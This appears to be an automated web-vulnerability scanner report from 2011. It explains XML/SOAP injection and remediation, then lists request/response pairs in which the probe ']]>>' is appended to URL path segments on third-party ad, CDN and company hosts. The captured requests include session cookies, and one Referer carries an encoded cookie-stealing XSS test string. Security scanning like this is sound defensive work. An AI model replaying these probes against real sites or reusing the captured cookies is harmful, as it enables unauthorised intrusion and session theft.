XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adsc]]>>/d852910/8/40051907/decide.php HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-1;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:43:46 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=487 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen]]>>/st.php HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-1;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:43:43 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=975 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /adscgen/st.php]]>> HTTP/1.1 Host: amch.questionmarket.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01_852910-XHktM-0; CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6_40051907-8-1;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:43:46 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Keep-Alive: timeout=5, max=77 Connection: Keep-Alive Content-Type: text/html Content-Language: en Content-Length: 1065
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /kcontent]]>>/478/ktag.js HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:44:42 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1478
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /kcontent/478]]>>/ktag.js HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:44:45 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1478
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /kcontent/478/ktag.js]]>> HTTP/1.1 Host: amch.questionmarket.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CS1=823529-1-2_39959898-17-1_40016019-8-1_40015506-8-3_849331-6-5_825697-8-1_39942282-8-1_39823749-21-1_40142779-4-1_38973908-10-1_865756-1-6; ES=823529-ie.pM-MG_844890-`:tqM-0_822109-|RIsM-26_853829-y]GsM-Bi1_847435-l^GsM-!"1_791689-/qcsM-0_852149-*jtsM-0_775684-'LysM-0_865756-tvKtM-01
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:44:47 GMT Server: Apache/2.2.3 Vary: accept-language Accept-Ranges: bytes Content-Type: text/html Content-Language: en Content-Length: 1478
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /button.js]]>> HTTP/1.1 Host: api.tweetmeme.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: user_unique_ident=4d4300485cccb8.88856407-57c11f7a933564d3f62b1bb71b01e19d; __utmz=229010307.1295907700.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=229010307.737407932.1295907700.1295907700.1295907700.1; __qca=P0-724637325-1295907700201; __qseg=Q_D|Q_T|Q_2891|Q_2867|Q_2866|Q_2865|Q_2363|Q_2362|Q_2355|Q_2353|Q_2352|Q_2349|Q_2339|Q_1286|Q_1160|Q_1159|Q_1156|Q_1149|Q_1148|Q_983;
Response
HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Sun, 06 Feb 2011 17:18:44 GMT Content-Type: text/xml; charset='utf-8' Connection: close P3P: CP="CAO PSA" X-Served-By: h04 Content-Length: 117
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot]]>>/r2/v4b/assets/300x250.swf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: D234D51148357D28 x-amz-id-2: Zds+GcEQI8qdHgrPZZnBxq8v0aufYjF5xSL+AjM67SYFJxLUCaC4DtJnbXdil6Zy Content-Type: application/xml Date: Sat, 05 Feb 2011 22:46:59 GMT Server: AmazonS3 Connection: close
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2]]>>/v4b/assets/300x250.swf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: 280A7AB5EA5C302C x-amz-id-2: IOhRAAx/tsr5ypSytLaGewvhuMO8D4WhbY+uDEm11hokkmCuuEHtYRw2DW16V+cb Content-Type: application/xml Date: Sat, 05 Feb 2011 22:47:06 GMT Server: AmazonS3 Connection: close
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b]]>>/assets/300x250.swf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: 06E051E8A7F779FE x-amz-id-2: RR81aybRkCfOF2vURFbUFPDaO9cbV0KDMeZvfqRbkZM1yFywrWhDScGd2t5dAacb Content-Type: application/xml Date: Sat, 05 Feb 2011 22:47:14 GMT Server: AmazonS3 Connection: close
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b/assets]]>>/300x250.swf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: 17BFC9E38192426D x-amz-id-2: 9oW+dOGkuk2Ek9rcTO0dTwED+593S/pyDouRVgHzj8r81PgBxBFWYvaY0Mf2FEV1 Content-Type: application/xml Date: Sat, 05 Feb 2011 22:47:17 GMT Server: AmazonS3 Connection: close
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b/assets/300x250.swf]]>> HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: F09EC1139B9C2F8B x-amz-id-2: xfHNf0fMa5b8G4hNc17mXDVVxML9J5HjCnJ0PkIgZcsO0NSP3xjbAwe6J8pKN9PA Content-Type: application/xml Date: Sat, 05 Feb 2011 22:47:19 GMT Server: AmazonS3 Connection: close
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot]]>>/r2/v4b/bin/RectangleGrid.swf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: 5A551C3AC0323669 x-amz-id-2: h3CjuEjm20aeIMh3mvax5apCyZrkT12z+mrD2c8UQV86ZOkHJJPgQp0PMgcAnCOH Content-Type: application/xml Date: Sat, 05 Feb 2011 22:46:56 GMT Server: AmazonS3 Connection: close
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2]]>>/v4b/bin/RectangleGrid.swf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: AFE38DC9E9E3200B x-amz-id-2: 9UXiPFpXY9upXw4IO/quC3Dv52SVZLjCZRkAYl1xmDY8vdvKnyXo9/vkhZhbJ7jb Content-Type: application/xml Date: Sat, 05 Feb 2011 22:47:04 GMT Server: AmazonS3 Connection: close
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b]]>>/bin/RectangleGrid.swf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: 8E0202B5D6BD0602 x-amz-id-2: ZzVkv84cOplsVqChPOf5Bpob/NAms4s7SZRGQ3v5yZlWCZBfCSheXfI3jziV2uzX Content-Type: application/xml Date: Sat, 05 Feb 2011 22:47:09 GMT Server: AmazonS3 Connection: close
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b/bin]]>>/RectangleGrid.swf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: 2BAAB635216ECD8F x-amz-id-2: EYEQ5vpEeZAdFuFfpEj050sFcsj3TKP/HHDxp+kpRfS9BmLmOaGglz7zMyts8tmt Content-Type: application/xml Date: Sat, 05 Feb 2011 22:47:16 GMT Server: AmazonS3 Connection: close
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/r2/v4b/bin/RectangleGrid.swf]]>> HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: 061A64CC2842ECD0 x-amz-id-2: qtmcWuzp7SVdTikwXUXZ3C2d/tq9l2sP4R/qrqhjMMriiMZnvlFYvU2g2GC1QGAO Content-Type: application/xml Date: Sat, 05 Feb 2011 22:47:18 GMT Server: AmazonS3 Connection: close
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot]]>>/v4b/assets/Coupons1.pdf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: AD51746F9153E66B x-amz-id-2: JoWHMvZ2ww4LV2KZUc9pd7TE3UsP0u7ipmPhDb7HG9I6j+Msir4tb8DTCakFjBwk Content-Type: application/xml Date: Sat, 05 Feb 2011 22:46:55 GMT Server: AmazonS3 Connection: close
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/v4b]]>>/assets/Coupons1.pdf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: 19402391640B4383 x-amz-id-2: 2eiQyaS2QvfsdNDHvrpTyElwpb/b3dQH02lM7UlyV0xijlZRlAO0sN82WQ96O6nW Content-Type: application/xml Date: Sat, 05 Feb 2011 22:46:55 GMT Server: AmazonS3 Connection: close
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/v4b/assets]]>>/Coupons1.pdf HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: D4D42DEE76A3B5D1 x-amz-id-2: 2u0eiQPOg3JyXit2U31Wp8OyuyAgBDwnn0iXpD6oHtuoC1jdXxXgQkEIotcEQZG6 Content-Type: application/xml Date: Sat, 05 Feb 2011 22:46:57 GMT Server: AmazonS3 Connection: close
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /officedepot/v4b/assets/Coupons1.pdf]]>> HTTP/1.1 Host: cdn.statics.live.spongecell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden x-amz-request-id: 9BD2EBDFA1E7ABBA x-amz-id-2: hAKFGPEFmhv1dvMeAQzPrkltLlrXxJIuLEFu/0BQktNZNE16q51j5TStD1UnIwCh Content-Type: application/xml Date: Sat, 05 Feb 2011 22:46:57 GMT Server: AmazonS3 Connection: close
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes]]>>/splunk_com/scripts/js/contrib/Myriad_Pro_Regular_400.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:28 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com]]>>/scripts/js/contrib/Myriad_Pro_Regular_400.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:29 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts]]>>/js/contrib/Myriad_Pro_Regular_400.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:50:32 GMT Server: lighttpd/1.4.22
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /themes/splunk_com/scripts/js]]>>/contrib/Myriad_Pro_Regular_400.font.js HTTP/1.1 Host: coverall.splunk.com Proxy-Connection: keep-alive Referer: http://www.splunk.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: XARAYASID=1mtgfd73mkm07svvqv720eu567; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=204527314.226449434.1296942566.1296942566.1296942566.1; __utmb=204527314.1.10.1296942566; Apache=173.193.214.243.1296942930878168
Response
